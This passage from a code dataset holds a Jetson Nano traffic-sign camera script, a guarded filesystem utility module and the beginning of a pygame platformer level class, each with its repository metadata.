= data\n #data = npframe\n #data = cv2.cvtColor (data, cv2.COLOR_BGR2RGB)\n #print('data b4 %x %x %x' % (data[-1:,-1:,0][0][0], data[-1:,-1:,1][0][0], data[-1:,-1:,2][0][0]))\n #color = ((npframe[:, :, 2] & 0xF8) << 8) | ((npframe[:, :, 1] & 0xFC) << 3) | (npframe[:, :, 0] >> 3)\n color = (((data[:, :, 0] >> 3) & 0x1F) << 11) | (((data[:, :, 2] >> 2) & 0x3F) << 5) | ((data[:, :, 1] >> 3) & 0x1F)\n ## data b4 [[152]] [[178]] [[155]]\n ## 152 0x13 0x9800 | 0x2c 0x580 | 0x13 = 0x9D93\n ## data after [134] [102]\n ## data b4: 9c b2 9a = 0x51200 | 0x128 | 0x19 = 0x51339\n ## \n ## data after 26 46 = 0x13 0x39\n #print('data after %x %x' % (color[-1:,0][0], color[-1:,0][0]))\n #print('color {}'.format(color.shape))\n #arru16 = np.zeros((data.shape[0], data.shape[1], 2), dtype=np.uint16)\n arru16 = np.dstack(((color >> 8) & 0xFF, color & 0xFF)) #(color >> 8) & 0xFF, color & 0xFF\n return arru16\n## \ndef show_ui():\n if show_ui == False:\n return\n # draw black bars\n wframe = np.zeros((_SH, _SW, 3), dtype=np.uint8) #+ (255, 255, 255) # background color (0, 0, 0)\n ##wframe = np.zeros((480, 640, 3), dtype=np.uint8) #+ (255, 255, 255) # background color (0, 0, 0)\n global ui_sign, ui_find, ui_shot\n if ui_sign is not None:\n if ui_sign.shape[0] != _hSH or ui_sign.shape[1] != _hSW:\n ui_sign = cv2.resize(ui_sign, (_hSW, _hSH), interpolation = cv2.INTER_AREA)\n #print (\"resize sign\")\n wframe[0:_hSH, 0:_hSW] = ui_sign\n #wframe[0:0 + result.shape[0], 0:0 + result.shape[1]] = result\n if ui_find is not None:\n if ui_find.shape[0] != _hSH or ui_find.shape[1] != _hSW:\n ui_find = cv2.resize(ui_find, (_hSW, _hSH), interpolation = cv2.INTER_AREA)\n #print (\"resize find\")\n wframe[0:_hSH, _hSW:_SW] = ui_find\n #wframe[0:0 + result.shape[0], 0:0 + result.shape[1]] = result\n if ui_shot is not None:\n if ui_shot.shape[0] != _hSH or ui_shot.shape[1] != _SW:\n ui_shot = cv2.resize(ui_shot, (_SW, _hSH), interpolation = cv2.INTER_AREA)\n #print (\"resize shot\")\n #ui_shot = cv2.cvtColor (ui_shot, cv2.COLOR_BGR2RGB)\n wframe[_hSH:_SH, 0:_SW] = ui_shot\n #wframe[0:0 + result.shape[0], 0:0 + result.shape[1]] = result\n cv2.imshow ('result', wframe)\n #cv2.imwrite ('/dev/fb2', wframe)\n # copy to framebuffer\n global fb\n #fb[0:320, 0:480] = np.copy(wframe)\n wf565 = image_to_data(wframe)\n #print('wf565 {}'.format(wf565.shape))\n fb[0:320, 0:480] = wf565 #np.copy (wf565)\n #\n##\ndef show_sign(sign):\n # draw black bars\n wframe = np.zeros((_SH, _SW, 3), dtype=np.uint8) #+ (255, 255, 255) # background color (0, 0, 0)\n ##wframe = np.zeros((480, 640, 3), dtype=np.uint8) #+ (255, 255, 255) # background color (0, 0, 0)\n if sign is not None:\n sign = cv2.resize(sign, (_SH, _SH), interpolation = cv2.INTER_AREA)\n sy, sx = (wframe.shape[0] - sign.shape[0])//2, (wframe.shape[1] - sign.shape[1])//2\n wframe[sy:sy + sign.shape[0], sx:sx + sign.shape[1]] = sign\n #wframe[0:0 + result.shape[0], 0:0 + result.shape[1]] = result\n cv2.imshow ('result', wframe)\n##\ndef prep_camera (video_file, csi_camera, opt_camera, wbmode):\n if video_file is not None:\n camera = cv2.VideoCapture (video_file)\n else:\n # camera setup\n #display = jetson.utils.glDisplay ()\n if csi_camera == False:\n camera = jetson.utils.gstCamera (opt.width, opt.height, opt.camera)\n img, width, height = camera.CaptureRGBA (zeroCopy = True)\n jetson.utils.cudaDeviceSynchronize ()\n jetson.utils.saveImageRGBA (\"camera.jpg\", img, width, height)\n # create a numpy ndarray that references the CUDA memory\n # it won't be copied, but uses the same memory underneath\n aimg = jetson.utils.cudaToNumpy (img, width, height, 4)\n #print (aimg)\n #aimg1 = aimg.astype (numpy.uint8)\n #print (\"img shape {}\".format (aimg1.shape))\n aimg1 = cv2.cvtColor (aimg, cv2.COLOR_RGBA2BGR)\n #print (aimg1)\n cv2.imwrite (\"array.jpg\", aimg1)\n # save as image\n #exit()\n else:\n #camera = CSICamera (width=opt.width, height=opt.height)\n # CSI\n # or\n #camera = USBCamera (width=opt.width, height=opt.height, capture_device=3)\n # camstr = 'v4l2src device=/dev/video{} ! video/x-raw, width=(int){}, height=(int){}, framerate=(fraction){}/1 ! videoconvert ! video/x-raw, , format=(string)BGR ! appsink wait-on-eos=false drop=true'.format(\n # 1, opt.width, opt.height, 30)\n # image_resized = cv2.resize(image,(int(self.width),int(self.height)))\n # > gst-inspect-1.0 nvarguscamerasrc\n # wbmode : White balance affects the color temperature of the photo\n # flags: readable, writable\n # Enum \"GstNvArgusCamWBMode\" Default: 1, \"auto\"\n # (0): off - GST_NVCAM_WB_MODE_OFF\n # (1): auto - GST_NVCAM_WB_MODE_AUTO\n # (2): incandescent - GST_NVCAM_WB_MODE_INCANDESCENT\n # (3): fluorescent - GST_NVCAM_WB_MODE_FLUORESCENT\n # (4): warm-fluorescent - GST_NVCAM_WB_MODE_WARM_FLUORESCENT\n # (5): daylight - GST_NVCAM_WB_MODE_DAYLIGHT\n # (6): cloudy-daylight - GST_NVCAM_WB_MODE_CLOUDY_DAYLIGHT\n # (7): twilight - GST_NVCAM_WB_MODE_TWILIGHT\n # (8): shade - GST_NVCAM_WB_MODE_SHADE\n # (9): manual - GST_NVCAM_WB_MODE_MANUAL\n # Please copy camera_overrides.isp to /var/nvidia/nvcam/settings and do below commands to install the ISP file.\n # sudo chmod 664 /var/nvidia/nvcam/settings/camera_overrides.isp\n # sudo chown root:root /var/nvidia/nvcam/settings/camera_overrides.isp\n # --\n \"\"\"\n GST_ARGUS: Available Sensor modes :\n GST_ARGUS: 3264 x 2464 FR = 21.000000 fps Duration = 47619048 ; Analog Gain range min 1.000000, max 10.625000; Exposure Range min 13000, max 683709000;\n GST_ARGUS: 3264 x 1848 FR = 28.000001 fps Duration = 35714284 ; Analog Gain range min 1.000000, max 10.625000; Exposure Range min 13000, max 683709000;\n GST_ARGUS: 1920 x 1080 FR = 29.999999 fps Duration = 33333334 ; Analog Gain range min 1.000000, max 10.625000; Exposure Range min 13000, max 683709000;\n GST_ARGUS: 1280 x 720 FR = 59.999999 fps Duration = 16666667 ; Analog Gain range min 1.000000, max 10.625000; Exposure Range min 13000, max 683709000;\n GST_ARGUS: 1280 x 720 FR = 120.000005 fps Duration = 8333333 ; Analog Gain range min 1.000000, max 10.625000; Exposure Range min 13000, max 683709000;\n GST_ARGUS: Running with following settings:\n Camera index = 0 \n Camera mode = 4 \n Output Stream W = 1280 H = 720 \n seconds to Run = 0 \n Frame Rate = 120.000005 \n GST_ARGUS: Setup Complete, Starting captures for 0 seconds\n --\n for 30fps we can use max: 1000/30 = 33ms exposure or 33000000ns: use with exposuretimerange=\"33000000 33000000\"\n \"\"\"\n #\n if int(opt_camera) > 0:\n camstr = 'v4l2src device=/dev/video{} ! video/x-raw, width=(int){}, height=(int){}, framerate=(fraction){}/1 ! videoconvert ! video/x-raw, , format=(string)BGR ! appsink wait-on-eos=false drop=true'.format(\n usb_camera, opt.width, opt.height, 30)\n else: #wbmode=0 awblock=true gainrange=\"1 1\" ispdigitalgainrange=\"1 1\" exposuretimerange=\"5000000 5000000\" aelock=true\n #camstr = 'nvarguscamerasrc wbmode=0 awblock=true gainrange=\"1 1\" ispdigitalgainrange=\"1 1\" exposuretimerange=\"20000000 20000000\" aelock=true ! video/x-raw(memory:NVMM), width=%d, height=%d, format=(string)NV12, framerate=(fraction)%d/1 ! nvvidconv flip-method=2 ! video/x-raw, width=(int)%d, height=(int)%d, format=(string)BGRx ! videoconvert ! appsink wait-on-eos=false drop=true max-buffers=1' % (\n #camstr = 'nvarguscamerasrc sensor-id=0 wbmode=0 awblock=true gainrange=\"1 1\" ispdigitalgainrange=\"1 1\" exposuretimerange=\"80000000 80000000\" aelock=true ! video/x-raw(memory:NVMM), width=%d, height=%d, format=(string)NV12, framerate=(fraction)%d/1 ! nvvidconv flip-method=2 ! video/x-raw, width=(int)%d, height=(int)%d, format=(string)BGRx ! videoconvert ! appsink wait-on-eos=false drop=true max-buffers=1' % (\n #camstr = 'nvarguscamerasrc sensor-id=0 wbmode=0 awblock=true gainrange=\"%d %d\" ispdigitalgainrange=\"1 1\" exposuretimerange=\"20000000 20000000\" aelock=true ! video/x-raw(memory:NVMM), width=%d, height=%d, format=(string)NV12, framerate=(fraction)%d/1 ! nvvidconv flip-method=2 ! video/x-raw, width=(int)%d, height=(int)%d, format=(string)BGRx ! videoconvert ! appsink wait-on-eos=false drop=true max-buffers=1' % (\n camstr = 'nvarguscamerasrc sensor-id=0 ! video/x-raw(memory:NVMM), width=%d, height=%d, format=(string)NV12, framerate=(fraction)%d/1 ! nvvidconv flip-method=2 ! video/x-raw, width=(int)%d, height=(int)%d, format=(string)BGRx ! videoconvert ! appsink wait-on-eos=false drop=true max-buffers=1' % (\n #wbmode, wbmode, opt.width, opt.height, 30, opt.width, opt.height)\n opt.width, opt.height, 30, opt.width, opt.height)\n print ('wbmode %d: %s' % (wbmode, camstr))\n #\n camera = cv2.VideoCapture (camstr, cv2.CAP_GSTREAMER)\n #\n return camera\n##\n##\nimport RPi.GPIO as GPIO\n#\ndef gpio_buttons ():\n global pin18btn\n cpin_val = GPIO.input(pin18btn)\n if cpin_val != gpio_buttons.pin18val:\n gpio_buttons.pin18val = cpin_val\n print('btn18 flip')\n if gpio_buttons.pin18flp == 0 and cpin_val == 1:\n gpio_buttons.pin18flp = 1\n return\ngpio_buttons.pin18val = 1\ngpio_buttons.pin18flp = 0\n##\n# camera analog gain\ncamgain_val = 0\n##\n# -- main block\n#\ncv2.namedWindow('result', cv2.WND_PROP_FULLSCREEN)\ncv2.setWindowProperty('result', cv2.WND_PROP_FULLSCREEN, cv2.WINDOW_FULLSCREEN)\n#show_sign(sign010)\nui_sign = extract_sign(30, False)\nui_find = extract_sign(30, False)\nui_shot = extract_sign(30, False)\nshow_ui()\n#show_sign(None)\n# wait for the UI to get rendered\ncv2.waitKey(100)\n## -\n## setup GPIO buttons\n# check pins at: /proc/device-tree/pinmux@700008d4/common//nvidia,function\n#\npin18btn = 32\nGPIO.setmode (GPIO.BOARD) # BOARD pin-numbering scheme\nGPIO.setup (pin18btn, GPIO.IN) # button pin set as input\n# use a 4.7k pull-up to 3v3 and button to GND\n#GPIO.add_event_detect (but_pin, GPIO.FALLING, callback=wbmode_switch, bouncetime=10)\n## -\ncamera = prep_camera(opt.file, csi_camera, opt.camera, 1)\n#\n# prep video storing\nif video_file == False and save_video == True:\n vname = \"./raw/video-{}p-{}.avi\".format (opt.height, datetime.now().strftime(\"%Y%m%d-%H%M%S-%f\"))\n # Define the codec and create VideoWriter object.The output is stored in 'outpy.avi' file.\n #fourcc = cv2.VideoWriter_fourcc(*'XVID') # cv2.VideoWriter_fourcc() does not exist\n #fourcc = cv2.VideoWriter_fourcc(*'X264') # cv2.VideoWriter_fourcc() does not exist\n fourcc = cv2.VideoWriter_fourcc(*'MJPG') # cv2.VideoWriter_fourcc() does not exist\n video_writer = cv2.VideoWriter (vname, fourcc, 30, (opt.width, opt.height))\n tsr_vs = TSRvideoSave ()\n tsr_vs.start (video_writer)\n#\n# load the recognition network\nimgnet = jetson.inference.imageNet (opt.network, sys.argv)\n# load the object detection network\n#detnet = jetson.inference.detectNet (\"ssd-mobilenet-v2\", threshold=0.5)\n# create the camera and display\n#font = jetson.utils.cudaFont ()\n# process frames until user exits\ntsr_fs = TSRframeSave ()\ntsr_fs.start ()\n#windowWidth = cv2.getWindowImageRect(\"result\")[2]\n#windowHeight = cv2.getWindowImageRect(\"result\")[3]\n#print(\"UI:screen size {}x{}\".format(windowWidth, windowHeight))\n#\n#\naFps = 0\n#while display.IsOpen():\nwhile True:\n try:\n ## test gpio buttons\n gpio_buttons()\n #\n if gpio_buttons.pin18flp == 1:\n gpio_buttons.pin18flp = 0\n camgain_val = camgain_val + 1\n if camgain_val > 10:\n camgain_val = 0\n #\n camera.release ()\n camera = prep_camera (opt.file, csi_camera, opt.camera, camgain_val)\n # #\n # capture the image\n if video_file == True:\n ret, aimg1 = camera.read()\n if ret == False:\n break\n else:\n if csi_camera == False:\n img, width, height = camera.CaptureRGBA (zeroCopy = True)\n jetson.utils.cudaDeviceSynchronize ()\n # create a numpy ndarray that references the CUDA memory\n # it won't be copied, but uses the same memory underneath\n aimg = jetson.utils.cudaToNumpy (img, width, height, 4)\n #print (\"img shape {}\".format (aimg1.shape))\n aimg1 = cv2.cvtColor (aimg.astype (np.uint8), cv2.COLOR_RGBA2BGR)\n else:\n ret, aimg = camera.read()\n if ret == False:\n break\n #aimg1 = cv2.flip (aimg, -1)\n aimg1 = aimg\n #\n cFk = cFk + 1\n #\n if save_video == True:\n # add frame to video\n #video_writer.write (aimg1)\n tsr_vs.save (aimg1)\n # do filter and classification\n kTS = \"{}\".format (datetime.now().strftime(\"%Y%m%d-%H%M%S-%f\"))\n # on 10watt nvpmodel -m0 && jetson_clocks:\n # img_subrange 28fps\n # check_red_circles 28fps\n # subrange + classify 38fps\n # red detect + classify: approx.30fps-60fps\n ###\n # subrange + classify 1 or 91 17fps\n #\n # on 5watt nvpmodel -m1 && jetson_clocks\n # img_subrange 28fps\n # check_red_circles NO AI 22fps\n # check_red_circles + classify +/- frame save 14fps \n #\n result = check_red_circles (aimg1, kTS) #img_subrange (aimg1) #check_red_circles (aimg1, kTS) #img_subrange (aimg1) #check_red_circles (aimg1, kTS)\n #result = aimg1\n #\n #fps computation\n cFps_sec = datetime.now().second\n lFps_k = lFps_k + 1\n if lFps_sec != cFps_sec:\n # we advance 1 sec\n lFps_c = lFps_k - 1\n lFps_k = 0\n lFps_rS = lFps_rS + 1 #increment seconds - we assume we get here every second\n # update ui once every second\n #turn off sign display\n if cs_sec > 0 and cs_spd > 0:\n # flash the sign indicator \n if lFps_rS % 2 == 0:\n write_to_7seg (-1)\n ui_sign = extract_sign(cs_spd, False)\n else:\n write_to_7seg (cs_spd)\n ui_sign = extract_sign(cs_spd, True)\n # stop flashing and show the last speed\n if cs_sec + 5 < lFps_rS:\n cs_sec = 0\n write_to_7seg (cs_spd)\n do_ai._lspd = -1\n ui_sign = extract_sign(cs_spd, True)\n # #\n if show_display == True:\n cv2.imshow ('result', result)\n else:\n cfpst = \"A{}/C{}\".format (aFps, lFps_c)\n cv2.putText (result, cfpst, (result.shape[1]-280, result.shape[0]-10), cv2.FONT_HERSHEY_SIMPLEX, 2, (0, 0, 255), 5, 0)\n ui_shot = result\n show_ui()\n # max fps?\n if lFps_M < lFps_k:\n lFps_M = lFps_k\n lFps_sec = cFps_sec\n #\n if show_fps == True:\n if False and show_display == True:\n cv2.putText (result, cfpst, (10, 10), cv2.FONT_HERSHEY_SIMPLEX, 2, (0, 0, 255), 2, 0)\n else:\n if (cFk % 50) == 0:\n #print (\"#i:max fps {}\".format (lFps_M))\n if lFps_rS > 0:\n aFps = int (cFk / lFps_rS)\n else:\n aFps = 1\n cfpst = \"FPS M{} / A{} / C{} : T{}f P{}f {}s\".format (lFps_M, aFps, lFps_c, cFk, kFot, lFps_rS)\n print (cfpst)\n # \n #if show_display == True:\n # # only display every 5 frames\n # if cFk % 5 == 0:\n # cv2.imshow ('result', result)\n # process input\n key = cv2.waitKey (1)\n #quit\n if key == ord('Q'):\n break\n if key == ord('q'):\n break\n if key == ESC:\n break\n # update POV\n update_pov(key)\n #\n #\n except KeyboardInterrupt:\n break\n#\n#if video_file == True:\ncamera.release()\n#\nGPIO.cleanup() # cleanup all GPIOs\n#\nif ser is not None:\n st = 'oooo'.format ()\n ser.write (st.encode ())\n#\ntsr_fs.stop()\nprint (\"#w:dropping {} frames\".format (tsr_fs.count()))\n#\nif save_video == True:\n tsr_vs.stop()\n print (\"#w:dropping {} video frames\".format (tsr_vs.count()))\n video_writer.release()\n#\nif show_display == True:\n cv2.destroyAllWindows()\n#\n","repo_name":"lmirel/nano-ssr","sub_path":"tsr-camera.py","file_name":"tsr-camera.py","file_ext":"py","file_size_in_byte":36535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
+{"seq_id":"13655497791","text":"import os\nimport shutil\nimport zipfile\nfrom pathlib import Path\n\nfrom .errors import CaptainError\n\n\nclass FileSystemError(CaptainError):\n def __init__(self, message: str):\n super().__init__(message)\n\n\ndef empty_directory(path: Path):\n if path == Path(\"/\"):\n raise FileSystemError(f\"refusing to run on {path}\")\n if not path.is_dir():\n raise FileSystemError(f\"not a directory: {path}\")\n for entry in path.iterdir():\n if entry.is_dir():\n shutil.rmtree(entry)\n else:\n os.remove(entry)\n\n\ndef remove_directory(path: Path):\n if path == Path(\"/\"):\n raise FileSystemError(f\"refusing to run on {path}\")\n if not path.is_dir():\n raise FileSystemError(f\"not a directory: {path}\")\n shutil.rmtree(path)\n\n\ndef create_zip_archive(archive_file_path: Path, source_dir: Path):\n with zipfile.ZipFile(archive_file_path, \"w\") as zf:\n for path in source_dir.rglob(\"*\"):\n zf.write(path, arcname=path.relative_to(source_dir))\n","repo_name":"jean-edouard-boulanger/captain","sub_path":"captain/core/fs.py","file_name":"fs.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
+{"seq_id":"9730946494","text":"import pygame\r\nimport json\r\nimport os\r\nfrom pygame import mixer\r\n\r\nfrom settings import *\r\nfrom tile import *\r\nfrom player import *\r\nfrom menu import *\r\nfrom coin import *\r\nfrom achievement import *\r\nfrom spike import *\r\nfrom button import *\r\nfrom level_menu import *\r\nfrom background import *\r\nfrom door import *\r\nfrom key import *\r\nfrom turtle import *\r\n\r\nclass Level:\r\n def __init__(self, surface, data_man):\r\n self.display_surface = surface\r\n self.data_man = data_man\r\n\r\n self.done = False\r\n\r\n ### DOT ###\r\n self.dot_image = pygame.image.load(os.path.join(ROOT_DIR, 'art', 'menu dot.png'))\r\n self.dot_rect = self.dot_image.get_rect(topleft=(WIDTH / 2 - 150, HEIGHT / 2 - 100))\r\n\r\n self.selected_option = 0\r\n self.moved = False\r\n\r\n self.curr_lvl = 0\r\n self.game_state = 'menu' # false - game, true - in menu\r\n\r\n ### LEVEL ###\r\n self.world_shift = 0\r\n\r\n self.static_player_pos_x = 6 * tile_size\r\n self.player_shift = 0\r\n\r\n self.spike_time = 2.5\r\n self.trigger_state = None\r\n\r\n self.temp_points = 0 # collected during a level\r\n self.keys_collected = 0\r\n\r\n ### OTHERS ###\r\n self.touches_trigger = False\r\n self.frame = 1\r\n\r\n self.data = {\r\n 'levels_completed': 0,\r\n 'coins': 0\r\n }\r\n\r\n if os.stat(os.path.join(ROOT_DIR, 'others','data.txt')).st_size == 0:\r\n self.clear_data()\r\n\r\n with open(os.path.join(ROOT_DIR, 'others','data.txt')) as datafile:\r\n self.data = json.load(datafile)\r\n\r\n self.curr_lvl = self.data[\"levels_completed\"]\r\n self.lvl_data = levels[self.data[\"levels_completed\"]]\r\n\r\n self.levitate = False\r\n\r\n self.levels_with_exit_triggered = [0, 4]\r\n self.mid_air_jumps_allowed = False\r\n\r\n self.font = pygame.font.Font(os.path.join(ROOT_DIR, 'others', 'tahoma.ttf'), 32)\r\n self.cop_font = pygame.font.Font(os.path.join(ROOT_DIR, 'others', 'tahoma.ttf'), 10)\r\n \r\n self.coin_collect_sound = mixer.Sound(os.path.join(ROOT_DIR,'sounds', 'coin sound.wav'))\r\n self.button_press_sound = mixer.Sound(os.path.join(ROOT_DIR,'sounds', 'button.mp3'))\r\n self.death_sound = mixer.Sound(os.path.join(ROOT_DIR,'sounds', 'death.mp3'))\r\n self.achievement_sound = mixer.Sound(os.path.join(ROOT_DIR,'sounds', 'achievement.mp3'))\r\n self.key_sound = mixer.Sound(os.path.join(ROOT_DIR,'sounds', 'key.mp3'))\r\n self.door_sound = mixer.Sound(os.path.join(ROOT_DIR,'sounds', 'button.mp3'))\r\n self.switch_sound = mixer.Sound(os.path.join(ROOT_DIR, 'sounds', 'switch.mp3'))\r\n\r\n self.level_tiles = pygame.sprite.Group()\r\n self.setup_level_tiles()\r\n\r\n if self.curr_lvl in self.levels_with_exit_triggered:\r\n self.setup_level(self.lvl_data, 'triggered', True) # TODO: change after saving, DONE\r\n else:\r\n self.setup_level(self.lvl_data, 'not_triggered', True)\r\n\r\n mixer.music.load(os.path.join(ROOT_DIR,'sounds', 'music1.mp3'))\r\n mixer.music.set_volume(MUSIC_VOLUME)\r\n mixer.music.play(-1)\r\n\r\n def get_input_dot(self):\r\n keys = pygame.key.get_pressed()\r\n\r\n if not self.moved:\r\n if keys[pygame.K_DOWN] or keys[pygame.K_s]:\r\n self.moved = True\r\n if self.selected_option == 2:\r\n self.selected_option = 0\r\n self.dot_rect.y = HEIGHT / 2 - 100\r\n else:\r\n self.selected_option += 1\r\n self.dot_rect.y += 75\r\n elif keys[pygame.K_UP] or keys[pygame.K_w]:\r\n self.moved = True\r\n if self.selected_option == 0:\r\n self.selected_option = 2\r\n self.dot_rect.y = HEIGHT / 2 + 50\r\n else:\r\n self.selected_option -= 1\r\n self.dot_rect.y -= 75\r\n elif keys[pygame.K_RETURN]:\r\n self.moved = True\r\n if self.selected_option == 0:\r\n self.game_state = 'game'\r\n elif self.selected_option == 1:\r\n self.game_state = 'level_menu'\r\n elif self.selected_option == 2:\r\n self.done = True\r\n\r\n def update_dot(self):\r\n self.get_input_dot()\r\n\r\n def setup_level_tiles(self):\r\n self.level_tiles.empty()\r\n\r\n for i in range(self.data[\"levels_completed\"] + 1):\r\n self.level_tiles.add(Level_tile((0+100*i, 0), (100, 58), i))\r\n\r\n def setup_level(self, layout, state, spawn_player_higher=False, height=100):\r\n # basic setup\r\n if self.curr_lvl > self.data[\"levels_completed\"]:\r\n self.data[\"levels_completed\"] = self.curr_lvl\r\n \r\n self.keys_collected = 0\r\n self.trigger_state = state\r\n\r\n # saving data\r\n self.data_man.save_data(self.data[\"levels_completed\"], self.data[\"coins\"])\r\n\r\n self.setup_level_tiles()\r\n\r\n # menu\r\n self.menu = pygame.sprite.GroupSingle()\r\n self.menu.add(Menu((WIDTH / 2 - 114, HEIGHT / 2 - 100))) # size 228x200 px\r\n\r\n self.bckg = pygame.sprite.GroupSingle()\r\n self.bckg.add(Background((WIDTH, HEIGHT)))\r\n\r\n # mobs\r\n self.turtles = pygame.sprite.Group()\r\n\r\n # blocks\r\n self.tiles = pygame.sprite.Group()\r\n\r\n self.coins = pygame.sprite.Group()\r\n self.floating_pads = pygame.sprite.Group()\r\n\r\n # spikes\r\n self.spikes = pygame.sprite.Group()\r\n\r\n # mechanisms\r\n self.doors = pygame.sprite.Group()\r\n self.keys = pygame.sprite.Group()\r\n\r\n # player\r\n self.player = pygame.sprite.GroupSingle() \r\n\r\n # achievements\r\n self.achievement1 = pygame.sprite.GroupSingle()\r\n\r\n self.data[\"coins\"] += self.temp_points\r\n self.temp_points = 0\r\n\r\n for row_index, row in enumerate(layout):\r\n for col_index, cell in enumerate(row):\r\n if cell == 'P':\r\n self.player_shift = -(col_index * tile_size) + self.static_player_pos_x # -(col*tl - static_x) = -col*tl + static_x\r\n break\r\n\r\n # loading level\r\n for row_index, row in enumerate(layout):\r\n for col_index, cell in enumerate(row):\r\n x = (col_index * tile_size) + self.player_shift\r\n y = row_index * tile_size\r\n\r\n if cell == 'X': # block\r\n self.tiles.add(Tile('brick', (x, y)))\r\n elif cell == 'C': # coin\r\n self.coins.add(Coin(x, y))\r\n elif cell == 'P': # player\r\n player_sprite = Player((x, y)) if not spawn_player_higher else Player((x, y - height))\r\n self.player.add(player_sprite)\r\n elif cell == 'E': # exit\r\n self.tiles.add(Tile('exit_tile', (x, y), state))\r\n elif cell == 'T': # exit trigger\r\n self.tiles.add(Tile('exit_trigger', (x, y)))\r\n elif cell == 'F': # floating pad\r\n self.floating_pads.add(Floating_pad((x, y + tile_size - Floating_pad._height)))\r\n elif cell == 'R': # royal block\r\n self.tiles.add(Tile('royal_block', (x, y)))\r\n elif cell == 'D': # door\r\n self.doors.add(Door((x, y)))\r\n elif cell == 'K': # key\r\n self.keys.add(Key((x + 16, y + 16)))\r\n elif cell == 'Q': # cart\r\n self.turtles.add(Turtle((x, y + tile_size - 50)))\r\n elif cell == 'g': # green trigger\r\n self.tiles.add(Tile('green_trigger', (x, y)))\r\n elif cell == 'r': # red trigger\r\n self.tiles.add(Tile('red_trigger', (x, y)))\r\n elif cell == '@': # green inactivated\r\n self.tiles.add(Tile('green_block', (x, y), None, 'off'))\r\n elif cell == '#': # green activated\r\n self.tiles.add(Tile('green_block', (x, y), None, 'on'))\r\n elif cell == '$': # red inactivated\r\n self.tiles.add(Tile('red_block', (x, y), None, 'off'))\r\n elif cell == '^': # red activated\r\n self.tiles.add(Tile('red_block', (x, y), None, 'on'))\r\n elif cell == '1': # Spike up\r\n self.spikes.add(Spike('spike_up', (x, y + tile_size - 32), None))\r\n elif cell == '2': # Spike down\r\n self.spikes.add(Spike('spike_down', (x, y), None))\r\n elif cell == '3': # Spike right\r\n self.spikes.add(Spike('spike_right', (x, y), None))\r\n elif cell == '4': # spike left\r\n self.spikes.add(Spike('spike_left', (x + 32, y), None))\r\n elif cell == '5': # Angry spike up\r\n self.spikes.add(Spike('angry_spike_up', (x, y + tile_size - 32), self.spike_time))\r\n elif cell == '6': # Angry spike down\r\n self.spikes.add(Spike('angry_spike_down', (x, y), self.spike_time))\r\n elif cell == '7': # Angry spike right\r\n self.spikes.add(Spike('angry_spike_right', (x, y), self.spike_time))\r\n elif cell == '8': # Angry spike left\r\n self.spikes.add(Spike('angry_spike_left', (x + 32, y), self.spike_time))\r\n elif cell == '!': # mid air achievement\r\n self.achievement1.add(Mid_air_jump_achievement((x + 16, y + 16), 16))\r\n \r\n def scroll_x(self):\r\n player = self.player.sprite\r\n player_x = player.rect.centerx\r\n direction_x = player.direction.x\r\n\r\n if player_x < screen_width / 3.5 and direction_x < 0:\r\n self.world_shift = 6\r\n player.speed = 0\r\n elif player_x > screen_width - (screen_width / 3.5) and direction_x > 0:\r\n self.world_shift = -6\r\n player.speed = 0\r\n else:\r\n self.world_shift = 0\r\n player.speed = 6\r\n \r\n def coin_collision(self):\r\n for coin in self.coins.sprites():\r\n if coin.rect.colliderect(self.player.sprite.rect): #if player hits a coin\r\n self.coin_collect_sound.play()\r\n\r\n self.coins.remove(coin)\r\n self.temp_points += 1\r\n #self.total_points += 1\r\n \r\n def key_collision(self):\r\n for key in self.keys.sprites():\r\n if key.rect.colliderect(self.player.sprite.rect):\r\n self.key_sound.play()\r\n self.keys.remove(key)\r\n\r\n self.keys_collected += 1\r\n #self.data[\"keys\"] += 1\r\n \r\n def door_collision(self):\r\n for door in self.doors.sprites():\r\n if door.rect.colliderect(self.player.sprite.rect):\r\n if self.keys_collected > 0:\r\n self.door_sound.play()\r\n self.keys_collected -= 1\r\n\r\n self.doors.remove(door)\r\n\r\n def achievement_collision(self):\r\n if self.achievement1:\r\n player = self.player.sprite\r\n midairjumpachievement = self.achievement1.sprite\r\n\r\n if player.rect.colliderect(midairjumpachievement.rect):\r\n self.achievement_sound.play()\r\n self.achievement1.remove(self.achievement1.sprite)\r\n self.mid_air_jumps_allowed = True\r\n\r\n \r\n def floating_pad_collision(self):\r\n for pad in self.floating_pads.sprites():\r\n if pad.rect.colliderect(self.player.sprite.rect):\r\n if not pad.pressed:\r\n self.button_press_sound.play()\r\n self.levitate = True\r\n self.timer = time.time()\r\n\r\n pad.pressed = True\r\n else:\r\n pad.pressed = False\r\n\r\n def exit_trigger_collision(self):\r\n for tile in self.tiles.sprites():\r\n if tile.type == 'exit_trigger' and not self.trigger_state == 'triggered':\r\n if tile.rect.colliderect(self.player.sprite.rect):\r\n tile.state = tile.states['triggered']\r\n self.trigger_state = 'triggered'\r\n\r\n self.unlock_exit()\r\n return\r\n\r\n def exit_collision(self):\r\n for tile in self.tiles.sprites():\r\n if tile.type == 'exit_tile':\r\n if tile.rect.colliderect(self.player.sprite.rect) and self.trigger_state == 'triggered':\r\n if len(levels) >= self.curr_lvl + 2: # check if out of range\r\n self.curr_lvl += 1\r\n self.lvl_data = levels[self.curr_lvl]\r\n\r\n if self.curr_lvl in self.levels_with_exit_triggered:\r\n self.setup_level(self.lvl_data, 'triggered', True)\r\n else:\r\n self.setup_level(self.lvl_data, 'not_triggered', True)\r\n\r\n def spike_collision(self):\r\n for spike in self.spikes.sprites():\r\n if spike.rect.colliderect(self.player.sprite.rect):\r\n self.death()\r\n\r\n def turtle_collision(self):\r\n for turtle in self.turtles.sprites():\r\n if turtle.rect.colliderect(self.player.sprite.rect):\r\n self.death()\r\n \r\n def turtle_bounce_collision(self):\r\n for turtle in self.turtles.sprites():\r\n for tile in self.tiles.sprites():\r\n if not ((tile.type == 'red_block' and tile.state_block == 'off') or (\r\n tile.type == 'green_block' and tile.state_block == 'off'\r\n )):\r\n if tile.rect.y == turtle.rect.y - 14:\r\n if tile.rect.colliderect(turtle.rect):\r\n turtle.dir = turtle.dirs[\"right\"] if turtle.dir == turtle.dirs[\"left\"] else turtle.dirs[\"left\"]\r\n return\r\n for spike in self.spikes.sprites():\r\n # 32 50\r\n if (spike.type == 'spike_up' or (spike.type == 'angry_spike_up' and spike.state == spike.states['closed'])):\r\n if spike.rect.y == turtle.rect.y + 18: # TODO: change to height\r\n if spike.rect.colliderect(turtle.rect):\r\n turtle.dir = 